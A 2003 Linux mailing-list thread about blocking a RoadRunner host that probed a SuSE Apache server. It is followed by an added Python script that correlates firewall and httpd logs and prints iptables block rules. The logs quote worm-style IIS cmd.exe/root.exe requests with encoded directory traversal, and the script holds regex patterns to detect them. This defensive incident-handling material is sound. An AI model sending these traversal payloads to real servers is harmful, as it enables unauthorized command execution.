* Peer Stefan
Hi Patrick,
From: Patrick Shanahan [mailto:WideGlide@MyRealBox.com]
[snip]
[more snip]
Maybe, but I'd try to contact abuse@rr.com. Check for the e-mail address with "whois 24.208.133.143" ;-)
abuse@rr.com has been contacted also, but they do not want it. I help-chatted with a RR rep who apparently was reading from a script. He kept asking me if it was spam <grin>. Didn't know about firewall and httpd logs.
who is on the wrong end and also a RoadRunner user.
A Windows-User with open VNC-ports, open SMB-ports and some other interesting stuff :o)
What to do, what to do ??
Have a look at "netstat -an|grep 24.208.133.143" and check whether there is still an active connection.
Not at the moment, but I will check periodically during the day.
Please send the interesting part of your logfile to the list.
firewall:

Mar 20 06:44:18 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=31653 DF PROTO=TCP SPT=1492 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402)
Mar 20 06:44:21 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=32087 DF PROTO=TCP SPT=1588 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402)
Mar 20 06:44:25 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=32532 DF PROTO=TCP SPT=1674 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402)
.... there are 11 similar lines

httpd:

24.208.133.143 - - [20/Mar/2003:06:44:20 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
24.208.133.143 - - [20/Mar/2003:06:44:23 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280
24.208.133.143 - - [20/Mar/2003:06:44:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
24.208.133.143 - - [20/Mar/2003:06:44:31 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
24.208.133.143 - - [20/Mar/2003:06:44:34 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
24.208.133.143 - - [20/Mar/2003:06:44:38 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.208.133.143 - - [20/Mar/2003:06:44:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.208.133.143 - - [20/Mar/2003:06:44:43 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337
24.208.133.143 - - [20/Mar/2003:06:44:46 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
24.208.133.143 - - [20/Mar/2003:06:44:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
24.208.133.143 - - [20/Mar/2003:06:44:52 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
24.208.133.143 - - [20/Mar/2003:06:44:55 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
24.208.133.143 - - [20/Mar/2003:06:44:58 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
24.208.133.143 - - [20/Mar/2003:06:45:00 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
24.208.133.143 - - [20/Mar/2003:06:45:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
24.208.133.143 - - [20/Mar/2003:06:45:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
You can always try the next two commands.

iptables -I INPUT -s 24.208.133.143 -j DROP
iptables -I OUTPUT -d 24.208.133.143 -j DROP

(Don't start the firewall services after entering the two commands.)
iptables -L | grep 24.208.133.143:

DROP all -- dhcp024-208-133-143.insight.rr.com anywhere
DROP all -- dhcp024-208-133-143.insight.rr.com anywhere
DROP all -- anywhere dhcp024-208-133-143.insight.rr.com
If these don't help, I'd begin to check for rootkits and logging the network traffic between your host and the evil IP address. But be careful - according to the hostname it's a DHCP address, so it may be changing.
Will report back, tks
--
Patrick Shanahan
Please avoid TOFU and trim >quotes<
http://wahoo.no-ip.org
Registered Linux User #207535
icq#173753138 @ http://counter.li.org
Linux, a continuous *learning* experience
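The log excerpts in this thread show the two places the same event leaves traces: the SuSE firewall ACCEPT lines (SYNs to DPT=80) and the httpd access log (a burst of cmd.exe/root.exe requests with double- and overlong-UTF-8-encoded "..", all answered 404/400 because the target is Apache, not IIS). The script below is an added example, not code from the thread or from SuSE: it parses both formats, correlates them by source address, and prints the iptables DROP commands Peer suggested (as text only; nothing is executed). The firewall and httpd sample lines are taken from the mail above; the 10.0.0.5 host and its /index.html request are constructed as a benign control. The PROBE_PATTERNS list is my own assumption about what to flag, derived from the encodings visible in the excerpt.

```python
"""Correlate SuSE-FW kernel log lines with Apache access-log probes per source IP."""
import re
from collections import defaultdict

# Constructed sample input: three firewall lines from the mail plus one benign host.
FW_LOG = """\
Mar 20 06:44:18 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=31653 DF PROTO=TCP SPT=1492 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402)
Mar 20 06:44:21 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=32087 DF PROTO=TCP SPT=1588 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402)
Mar 20 06:44:25 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=32532 DF PROTO=TCP SPT=1674 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402)
Mar 20 06:50:02 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=10.0.0.5 DST=192.168.0.2 LEN=48 TOS=0x00 PREC=0x00 TTL=64 ID=100 DF PROTO=TCP SPT=40000 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0
"""

# Constructed sample input: three probe lines from the mail plus one benign request.
HTTPD_LOG = """\
24.208.133.143 - - [20/Mar/2003:06:44:20 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
24.208.133.143 - - [20/Mar/2003:06:44:34 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
24.208.133.143 - - [20/Mar/2003:06:44:58 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
10.0.0.5 - - [20/Mar/2003:06:50:03 -0500] "GET /index.html HTTP/1.0" 200 1532
"""

# SuSE-FW lines: action, source address and destination port are all we need.
FW_RE = re.compile(r"SuSE-FW-(?P<action>\w+) .*?SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)")

# Apache common log format: host ident user [time] "method path proto" status size
HTTPD_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption: what counts as an IIS command-shell probe, based on the excerpt above.
PROBE_PATTERNS = [
    re.compile(r"/(?:cmd|root)\.exe", re.I),        # request for a Windows shell binary
    re.compile(r"\.\.(?:%25|%c0|%c1|%%35)", re.I),   # double- or overlong-encoded ".." traversal
]


def parse_fw_line(line):
    """Return {'action', 'src', 'dpt'} for a SuSE-FW kernel line, else None."""
    m = FW_RE.search(line)
    if not m:
        return None
    return {"action": m.group("action"), "src": m.group("src"), "dpt": int(m.group("dpt"))}


def parse_httpd_line(line):
    """Return the fields of one Apache common-log line, else None."""
    m = HTTPD_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_probe(path):
    """True if the request path matches any of the probe signatures."""
    return any(p.search(path) for p in PROBE_PATTERNS)


def summarize(fw_text, httpd_text):
    """Per source IP: accepted SYNs to port 80, probe count and probe paths.

    Only sources with at least one flagged request are returned, so a busy
    legitimate client never appears in the report.
    """
    report = defaultdict(lambda: {"syn_to_80": 0, "probes": 0, "paths": []})
    for line in fw_text.splitlines():
        rec = parse_fw_line(line)
        if rec and rec["action"] == "ACCEPT" and rec["dpt"] == 80:
            report[rec["src"]]["syn_to_80"] += 1
    for line in httpd_text.splitlines():
        rec = parse_httpd_line(line)
        if rec and is_probe(rec["path"]):
            report[rec["ip"]]["probes"] += 1
            report[rec["ip"]]["paths"].append(rec["path"])
    return {ip: v for ip, v in report.items() if v["probes"] > 0}


def block_rules(ips):
    """Render the two iptables commands from the thread for each flagged IP (strings only)."""
    rules = []
    for ip in sorted(ips):
        rules.append(f"iptables -I INPUT -s {ip} -j DROP")
        rules.append(f"iptables -I OUTPUT -d {ip} -j DROP")
    return rules


if __name__ == "__main__":
    report = summarize(FW_LOG, HTTPD_LOG)
    for ip, info in report.items():
        print(f"{ip}: {info['syn_to_80']} accepted SYNs to :80, {info['probes']} probe requests")
        for path in info["paths"]:
            print("   ", path)
    print("\n".join(block_rules(report)))
```

On a real host, read /var/log/messages (or wherever SuSE-FW logs land) and the httpd access log instead of the embedded strings; the firewall count is a useful cross-check that the source really reached port 80 rather than being a forged address in the access log alone. As Peer notes, a cable-modem DHCP address can change, so the generated rules are a short-term measure and the report to the ISP abuse desk is what should carry the log lines.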